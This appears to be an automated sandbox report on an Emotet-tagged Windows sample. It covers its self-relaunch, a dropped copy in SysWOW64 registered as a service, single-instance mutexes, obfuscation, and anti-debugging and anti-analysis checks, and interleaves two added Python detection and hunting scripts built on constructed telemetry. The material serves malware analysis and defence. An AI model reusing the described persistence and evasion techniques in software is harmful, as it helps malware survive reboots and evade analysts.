Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B37A5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B2F82
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F630E4
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F630E8
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F628C1
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F837A9
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F837A5
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F82F82
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F730E4
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F730E8
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F728C1
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F937A9
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F937A5
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F92F82
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00409E10 appears 68 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00453475 appears 85 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 004586AC appears 45 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00418788 appears 48 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 0045340C appears 537 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 004534AB appears 33 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00401510 appears 63 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00419804 appears 165 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 004534E4 appears 45 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 0045343F appears 240 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 00453220 appears 116 times
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: String function: 0041880C appears 37 times
PE file contains strange resources
Source: n5hhkdky_exe.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 resources)
Sample file is different than original file name gathered from version info
Source: n5hhkdky_exe.exe, 00000001.00000002.2129193086.00000000004A5000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2216734226.00000000004A5000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2217460089.00000000023F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2217460089.00000000023F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe, 00000004.00000002.2219862669.0000000003080000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs n5hhkdky_exe.exe
Source: n5hhkdky_exe.exe Binary or memory string: OriginalFilenameVisual Editor.EXEF vs n5hhkdky_exe.exe
Yara signature match
Source: 00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification label
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@7/1@0/9
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00429CCC __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,_DebugHeapAllocator,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA
Contains functionality to create services
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BE138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F9E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B1943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00416CBB __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,_DebugHeapAllocator,CoInitializeEx,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00401730 FindResourceA
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BE138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates mutexes
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\M66FC9C52
Source: C:\Windows\SysWOW64\leelsensor.exe Mutant created: \BaseNamedObjects\Global\M66FC9C52
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\I66FC9C52
Source: C:\Windows\SysWOW64\leelsensor.exe Mutant created: \BaseNamedObjects\Global\I66FC9C52
PE file has an executable .text section and no other executable section
Source: n5hhkdky_exe.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: n5hhkdky_exe.exe Virustotal: Detection: 78%
Source: n5hhkdky_exe.exe Metadefender: Detection: 62%
Source: n5hhkdky_exe.exe ReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain; consistent with the single --<8 hex digits> argument the sample passes to its own relaunch, listed under "Spawns processes")
Source: C:\Windows\SysWOW64\leelsensor.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processes
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: unknown Process created: C:\Users\user\Desktop\n5hhkdky_exe.exe 'C:\Users\user\Desktop\n5hhkdky_exe.exe'
Source: unknown Process created: C:\Users\user\Desktop\n5hhkdky_exe.exe --3abca77f
Source: unknown Process created: C:\Windows\SysWOW64\leelsensor.exe C:\Windows\SysWOW64\leelsensor.exe
Source: unknown Process created: C:\Windows\SysWOW64\leelsensor.exe --4e6ad84c
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Process created: C:\Users\user\Desktop\n5hhkdky_exe.exe --3abca77f
Source: C:\Windows\SysWOW64\leelsensor.exe Process created: C:\Windows\SysWOW64\leelsensor.exe --4e6ad84c
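The process list above shows the install sequence: the sample relaunches itself with one "--<8 hex digits>" argument, a copy with a random name is moved into C:\Windows\SysWOW64, and that copy is started and relaunches itself the same way. The script below, an added example and not Joe Sandbox or sample code, expresses this as two rules over Sysmon-like process-create and file-write events and correlates them, so that the dropped file being executed is reported even when its parent is unknown. EVENTS is constructed from the report's process list; the process IDs, the empty parent fields and the file-write event are assumptions.

```python
"""Correlate process-create and file-write telemetry for the install pattern in
this report: self-relaunch with a lone "--<8 hex digits>" argument, a copy
dropped under C:\\Windows\\SysWOW64, and that copy executed and relaunched.

Added example, not Joe Sandbox or sample code. EVENTS is constructed from the
process list above in a Sysmon-like shape; pids, unknown parents and the
file-write event are assumptions.
"""
import re

HEX8_ARG = re.compile(r"--[0-9a-f]{8}")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

EVENTS = [
    {"type": "process", "pid": 4120, "image": r"C:\Users\user\Desktop\n5hhkdky_exe.exe",
     "cmdline": r"'C:\Users\user\Desktop\n5hhkdky_exe.exe'", "parent_image": ""},
    {"type": "process", "pid": 4188, "image": r"C:\Users\user\Desktop\n5hhkdky_exe.exe",
     "cmdline": "--3abca77f", "parent_image": r"C:\Users\user\Desktop\n5hhkdky_exe.exe"},
    # Assumed file-write event for the "PE file moved" finding in this report.
    {"type": "file", "pid": 4188, "image": r"C:\Users\user\Desktop\n5hhkdky_exe.exe",
     "target": r"C:\Windows\SysWOW64\leelsensor.exe"},
    {"type": "process", "pid": 4300, "image": r"C:\Windows\SysWOW64\leelsensor.exe",
     "cmdline": r"C:\Windows\SysWOW64\leelsensor.exe", "parent_image": ""},
    {"type": "process", "pid": 4352, "image": r"C:\Windows\SysWOW64\leelsensor.exe",
     "cmdline": "--4e6ad84c", "parent_image": r"C:\Windows\SysWOW64\leelsensor.exe"},
    # Benign control: the svchost group start also listed under "Spawns processes".
    {"type": "process", "pid": 2140, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k wusvcs -p", "parent_image": ""},
]


def is_relaunch(ev):
    """Child image equals parent image and the command line is a lone
    --xxxxxxxx token (optionally preceded by the image path)."""
    args = ev.get("cmdline", "").split()
    return (bool(args) and len(args) <= 2
            and ev.get("parent_image", "").lower() == ev["image"].lower()
            and HEX8_ARG.fullmatch(args[-1]) is not None)


def is_drop_into_system_dir(ev):
    """A process running outside C:\\Windows writes an .exe into a system directory."""
    target = ev["target"].lower()
    writer = ev["image"].lower()
    return (target.startswith(SYSTEM_DIRS) and target.endswith(".exe")
            and not writer.startswith("c:\\windows\\"))


def correlate(events):
    """Walk events in order; return (rule, image, detail) alerts. A process
    whose image was dropped earlier by a non-system writer is flagged
    regardless of who started it (services.exe, a scheduled task, or unknown)."""
    alerts, dropped = [], set()
    for ev in events:
        if ev["type"] == "file" and is_drop_into_system_dir(ev):
            dropped.add(ev["target"].lower())
            alerts.append(("drop_to_system_dir", ev["image"], ev["target"]))
        elif ev["type"] == "process":
            if ev["image"].lower() in dropped:
                alerts.append(("dropped_file_executed", ev["image"], ev["cmdline"]))
            if is_relaunch(ev):
                alerts.append(("self_relaunch_hex_arg", ev["image"], ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for rule, image, detail in correlate(EVENTS):
        print(f"{rule:24} {image}  {detail}")
```

The drop rule deliberately ignores what started the dropped binary: in this report its parent is "unknown" because the service control manager launched it, and a rule keyed on parent image alone would miss that start.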
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
PE file contains a mix of resources often seen in goodware
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_CURSOR
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_BITMAP
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_ICON
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_MENU
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_DIALOG
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_STRING
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_ACCELERATOR
Source: n5hhkdky_exe.exe Static PE information: resource type: RT_GROUP_ICON

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00402D80 LoadLibraryW,GetProcAddress,_malloc,_memset
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00453265 push ecx; ret 1_2_00453278
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004534E4 push ecx; ret 1_2_004534F7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00453265 push ecx; ret 4_2_00453278
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004534E4 push ecx; ret 4_2_004534F7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FAF1 push edx; retf 4_2_0229FAF8
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FAD3 push edx; iretd 4_2_0229FAD4
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FB0F push edx; retf 4_2_0229FB10
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FB1A push edx; retf 4_2_0229FB48
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FB77 push edx; iretd 4_2_0229FB84
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FD71 push edx; retf 4_2_0229FD80
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0229FD52 push edx; iretd 4_2_0229FD70
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FAF1 push edx; retf 5_2_00F6FAF8
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FAD3 push edx; iretd 5_2_00F6FAD4
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FB77 push edx; iretd 5_2_00F6FB84
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FD71 push edx; retf 5_2_00F6FD80
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FD52 push edx; iretd 5_2_00F6FD70
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FB1A push edx; retf 5_2_00F6FB48
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 5_2_00F6FB0F push edx; retf 5_2_00F6FB10
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FAF1 push edx; retf 8_2_00F7FAF8
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FAD3 push edx; iretd 8_2_00F7FAD4
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FB77 push edx; iretd 8_2_00F7FB84
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FD71 push edx; retf 8_2_00F7FD80
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FD52 push edx; iretd 8_2_00F7FD70
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FB1A push edx; retf 8_2_00F7FB48
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F7FB0F push edx; retf 8_2_00F7FB10

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\leelsensor.exe Executable created and started: C:\Windows\SysWOW64\leelsensor.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe PE file moved: C:\Windows\SysWOW64\leelsensor.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BE138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
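The persistence shown here is a service registered through OpenSCManagerW -> CreateServiceW -> ChangeServiceConfig2W -> StartServiceW whose binary is the dropped C:\Windows\SysWOW64\leelsensor.exe, and the single-instance guard is the pair of mutexes Global\M66FC9C52 and Global\I66FC9C52 that share one 8-hex-digit suffix (listed under "Creates mutexes"). The script below, an added example and not Joe Sandbox or sample code, covers both artifacts as hunting checks: one over System log event 7045 style service-install records, one over a handle listing. Both inputs are constructed; the report shows the CreateServiceW call chain but not its arguments, so the service name, start type and account are assumptions, as is the baseline of known-good images.

```python
"""Hunting checks for the persistence artefacts in this report: a service whose
ImagePath is a bare executable in a Windows system directory that is absent
from a known-good baseline, and the paired Global\\M<hex8> / Global\\I<hex8>
mutexes.

Added example, not Joe Sandbox or sample code. SERVICE_RECORDS mimics System
log event 7045 fields and MUTEX_NAMES a handle listing; both are constructed,
and the service name, start type and account are assumptions.
"""
import re

# Object-manager paths as logged (\Sessions\N\BaseNamedObjects\Global\... or
# \BaseNamedObjects\Global\...) or the bare name handed to CreateMutex.
MUTEX_RE = re.compile(
    r"^(?:\\(?:Sessions\\\d+\\)?BaseNamedObjects\\)?Global\\([MI])([0-9A-F]{8})$")

SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")

SERVICE_RECORDS = [
    # Assumed name/start type/account for the service registering leelsensor.exe.
    {"ServiceName": "leelsensor", "ImagePath": r"C:\Windows\SysWOW64\leelsensor.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    # Constructed benign control built from the svchost line under "Spawns processes".
    {"ServiceName": "BenignControl", "ImagePath": r"C:\Windows\system32\svchost.exe -k wusvcs -p",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

MUTEX_NAMES = [
    r"\Sessions\1\BaseNamedObjects\Global\M66FC9C52",
    r"\BaseNamedObjects\Global\M66FC9C52",
    r"\Sessions\1\BaseNamedObjects\Global\I66FC9C52",
    r"\BaseNamedObjects\Global\I66FC9C52",
    r"\BaseNamedObjects\Global\ConstructedBenignMutex",   # constructed negative case
]

# Baseline of service binaries expected in system directories; in practice
# build this from a clean reference host rather than by hand.
KNOWN_IMAGES = {"c:\\windows\\system32\\svchost.exe"}


def service_image(image_path):
    """First token of an ImagePath, lower-cased, with a quoted path honoured."""
    p = image_path.strip().lower()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def suspicious_service_installs(records, known_images):
    """7045-style records whose binary is a bare .exe in a Windows system
    directory and is not in the baseline."""
    hits = []
    for r in records:
        exe = service_image(r["ImagePath"])
        if exe.startswith(SYSTEM_DIRS) and exe.endswith(".exe") and exe not in known_images:
            hits.append((r["ServiceName"], r["ImagePath"], r["StartType"], r["AccountName"]))
    return hits


def paired_mutexes(names):
    """Suffixes seen with both the M and the I prefix, as in this report.
    Returns {suffix: {"M", "I"}}; a lone M or I name is not reported."""
    seen = {}
    for n in names:
        m = MUTEX_RE.match(n)
        if m:
            seen.setdefault(m.group(2), set()).add(m.group(1))
    return {suffix: prefixes for suffix, prefixes in seen.items() if prefixes == {"M", "I"}}


if __name__ == "__main__":
    for hit in suspicious_service_installs(SERVICE_RECORDS, KNOWN_IMAGES):
        print("service:", hit)
    for suffix in paired_mutexes(MUTEX_NAMES):
        print("mutex pair suffix:", suffix)
```

The service check is only as good as the baseline: a 32-bit service binary under SysWOW64 registered by a non-installer process is a strong hunting lead on its own, but a fixed allowlist will also miss legitimate third-party services, so treat hits as leads to verify against the installing process, not as verdicts.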

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe File opened: C:\Windows\SysWOW64\leelsensor.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0043E83B __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0040EF3B IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0040D69B IsWindowVisible,IsIconic
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0043E83B __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0040EF3B IsIconic,GetWindowPlacement,GetWindowRect
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0040D69B IsWindowVisible,IsIconic
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0042DE6A GetParent,GetParent,IsIconic,GetParent
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\leelsensor.exe Process information set: NOOPENFILEERRORBOX (6 occurrences)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex; matches the single-instance check on the Global\M66FC9C52 / Global\I66FC9C52 mutexes listed under "Creates mutexes")
Source: C:\Windows\SysWOW64\leelsensor.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BDE9C EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F9DE9C EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe API coverage: 3.4 %
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe API coverage: 5.2 %
Source: C:\Windows\SysWOW64\leelsensor.exe API coverage: 9.2 %
Checks the free space of harddrives
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00448F3F lstrlenA,FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00448F3F lstrlenA,FindFirstFileA,FindClose
Contains functionality to query system information
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00454FA3 VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW ("Hyper-V RAW" is the display name of the Winsock AF_HYPERV protocol provider present on every Windows 10 install, and it lands in the memory of any process that loads the Winsock catalog; here it sits in a private read/write region, so on its own it is not evidence of a deliberate VM check)
Program exit points
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe API call chain: ExitProcess graph end node (3 occurrences)
Source: C:\Windows\SysWOW64\leelsensor.exe API call chain: ExitProcess graph end node (3 occurrences)
Queries a list of all running processes
Source: C:\Windows\SysWOW64\leelsensor.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00454FA3 VirtualProtect ?,-00000001,00000104,?
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00402D80 LoadLibraryW,GetProcAddress,_malloc,_memset
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00402060 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_00402060 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_02290467 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_02290C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_02291743 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_022B12CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_022B1E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 5_2_00F60467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 5_2_00F60C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 5_2_00F61743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 5_2_00F812CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 5_2_00F81E04 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 8_2_00F70467 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 8_2_00F70C0C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 8_2_00F71743 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 8_2_00F912CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\leelsensor.exe; Code function: 8_2_00F91E04 mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_022B14F2 GetProcessHeap,RtlAllocateHeap
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_0045CF3A SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_0045CF3A SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_004516AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_0045DE2E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 4_2_00457FA7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe; Code function: 1_2_00422057 _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA
